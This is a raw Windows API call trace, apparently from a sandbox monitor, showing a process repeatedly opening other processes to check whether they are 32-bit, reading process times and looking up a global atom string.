	[0140.432] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.432] CloseHandle (hObject=0x2dc) returned 1
	[0140.432] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.432] CloseHandle (hObject=0x2dc) returned 1
	[0140.433] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.433] CloseHandle (hObject=0x2dc) returned 1
	[0140.433] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.433] CloseHandle (hObject=0x2dc) returned 1
	[0140.433] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.433] CloseHandle (hObject=0x2dc) returned 1
	[0140.433] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.433] CloseHandle (hObject=0x2dc) returned 1
	[0140.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.434] CloseHandle (hObject=0x2dc) returned 1
	[0140.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.434] CloseHandle (hObject=0x2dc) returned 1
	[0140.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.434] CloseHandle (hObject=0x2dc) returned 1
	[0140.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.435] CloseHandle (hObject=0x2dc) returned 1
	[0140.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.435] CloseHandle (hObject=0x2dc) returned 1
	[0140.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.435] CloseHandle (hObject=0x2dc) returned 1
	[0140.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.435] CloseHandle (hObject=0x2dc) returned 1
	[0140.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.436] CloseHandle (hObject=0x2dc) returned 1
	[0140.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.436] CloseHandle (hObject=0x2dc) returned 1
	[0140.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.436] CloseHandle (hObject=0x2dc) returned 1
	[0140.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.436] CloseHandle (hObject=0x2dc) returned 1
	[0140.437] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.437] CloseHandle (hObject=0x2dc) returned 1
	[0140.437] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.437] CloseHandle (hObject=0x2dc) returned 1
	[0140.437] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.437] CloseHandle (hObject=0x2dc) returned 1
	[0140.437] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.437] CloseHandle (hObject=0x2dc) returned 1
	[0140.438] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.438] CloseHandle (hObject=0x2dc) returned 1
	[0140.438] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.438] CloseHandle (hObject=0x2dc) returned 1
	[0140.438] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.438] CloseHandle (hObject=0x2dc) returned 1
	[0140.438] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.438] CloseHandle (hObject=0x2dc) returned 1
	[0140.439] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.439] CloseHandle (hObject=0x2dc) returned 1
	[0140.439] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.439] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.439] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.440] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.440] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.440] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.440] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.440] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.440] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.441] CloseHandle (hObject=0x2dc) returned 1
	[0140.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.441] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.441] CloseHandle (hObject=0x2dc) returned 1
	[0140.441] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.441] CloseHandle (hObject=0x2dc) returned 1
	[0140.441] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.441] CloseHandle (hObject=0x2dc) returned 1
	[0140.442] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.442] CloseHandle (hObject=0x2dc) returned 1
	[0140.442] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.442] CloseHandle (hObject=0x2dc) returned 1
	[0140.474] VirtualAlloc (lpAddress=0x0, dwSize=0x16ce8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0140.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16ce8, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0140.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0140.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0140.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0140.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0140.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0140.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0140.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0140.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0140.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0140.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0140.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0140.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0140.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0140.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0140.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0140.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0140.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0140.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0140.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0140.481] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.481] CloseHandle (hObject=0x2dc) returned 1
	[0140.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0140.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0140.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0140.481] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.481] CloseHandle (hObject=0x2dc) returned 1
	[0140.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0140.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0140.482] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.482] CloseHandle (hObject=0x2dc) returned 1
	[0140.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0140.482] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.482] CloseHandle (hObject=0x2dc) returned 1
	[0140.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0140.482] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.482] CloseHandle (hObject=0x2dc) returned 1
	[0140.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0140.483] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.483] CloseHandle (hObject=0x2dc) returned 1
	[0140.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0140.483] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.483] CloseHandle (hObject=0x2dc) returned 1
	[0140.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0140.483] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.483] CloseHandle (hObject=0x2dc) returned 1
	[0140.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0140.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0140.484] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.484] CloseHandle (hObject=0x2dc) returned 1
	[0140.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0140.484] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.484] CloseHandle (hObject=0x2dc) returned 1
	[0140.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0140.484] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.484] CloseHandle (hObject=0x2dc) returned 1
	[0140.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0140.484] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.484] CloseHandle (hObject=0x2dc) returned 1
	[0140.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0140.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.485] CloseHandle (hObject=0x2dc) returned 1
	[0140.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0140.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.485] CloseHandle (hObject=0x2dc) returned 1
	[0140.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0140.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.485] CloseHandle (hObject=0x2dc) returned 1
	[0140.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0140.486] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.486] CloseHandle (hObject=0x2dc) returned 1
	[0140.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0140.486] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.486] CloseHandle (hObject=0x2dc) returned 1
	[0140.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0140.486] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.486] CloseHandle (hObject=0x2dc) returned 1
	[0140.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0140.486] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.486] CloseHandle (hObject=0x2dc) returned 1
	[0140.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0140.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.487] CloseHandle (hObject=0x2dc) returned 1
	[0140.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0140.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.487] CloseHandle (hObject=0x2dc) returned 1
	[0140.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0140.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.487] CloseHandle (hObject=0x2dc) returned 1
	[0140.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0140.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.488] CloseHandle (hObject=0x2dc) returned 1
	[0140.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0140.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.488] CloseHandle (hObject=0x2dc) returned 1
	[0140.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0140.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.488] CloseHandle (hObject=0x2dc) returned 1
	[0140.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0140.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.488] CloseHandle (hObject=0x2dc) returned 1
	[0140.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0140.489] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.489] CloseHandle (hObject=0x2dc) returned 1
	[0140.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0140.489] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.489] CloseHandle (hObject=0x2dc) returned 1
	[0140.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0140.489] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.489] CloseHandle (hObject=0x2dc) returned 1
	[0140.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.489] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.490] CloseHandle (hObject=0x2dc) returned 1
	[0140.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.490] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.490] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.490] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.491] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.491] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.491] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.492] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.492] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.492] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.492] CloseHandle (hObject=0x2dc) returned 1
	[0140.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0140.492] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.493] CloseHandle (hObject=0x2dc) returned 1
	[0140.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0140.493] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.493] CloseHandle (hObject=0x2dc) returned 1
	[0140.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0140.493] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.493] CloseHandle (hObject=0x2dc) returned 1
	[0140.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0140.493] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.493] CloseHandle (hObject=0x2dc) returned 1
	[0140.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0140.494] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.494] CloseHandle (hObject=0x2dc) returned 1
	[0140.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0140.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0140.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0140.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0140.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0140.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0140.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0140.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0140.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0140.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0140.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0140.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0140.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0140.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0140.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0140.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0140.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0140.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0140.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0140.531] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.531] CloseHandle (hObject=0x2dc) returned 1
	[0140.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0140.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0140.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0140.532] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.532] CloseHandle (hObject=0x2dc) returned 1
	[0140.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0140.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0140.532] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.532] CloseHandle (hObject=0x2dc) returned 1
	[0140.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0140.532] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.533] CloseHandle (hObject=0x2dc) returned 1
	[0140.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0140.533] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.533] CloseHandle (hObject=0x2dc) returned 1
	[0140.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0140.533] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.533] CloseHandle (hObject=0x2dc) returned 1
	[0140.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0140.533] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.533] CloseHandle (hObject=0x2dc) returned 1
	[0140.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0140.534] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.534] CloseHandle (hObject=0x2dc) returned 1
	[0140.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0140.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0140.534] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.534] CloseHandle (hObject=0x2dc) returned 1
	[0140.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0140.534] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.534] CloseHandle (hObject=0x2dc) returned 1
	[0140.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0140.535] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.535] CloseHandle (hObject=0x2dc) returned 1
	[0140.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0140.535] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.535] CloseHandle (hObject=0x2dc) returned 1
	[0140.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0140.535] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.535] CloseHandle (hObject=0x2dc) returned 1
	[0140.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0140.536] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.536] CloseHandle (hObject=0x2dc) returned 1
	[0140.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0140.536] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.536] CloseHandle (hObject=0x2dc) returned 1
	[0140.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0140.536] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.536] CloseHandle (hObject=0x2dc) returned 1
	[0140.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0140.536] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.536] CloseHandle (hObject=0x2dc) returned 1
	[0140.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0140.537] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.537] CloseHandle (hObject=0x2dc) returned 1
	[0140.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
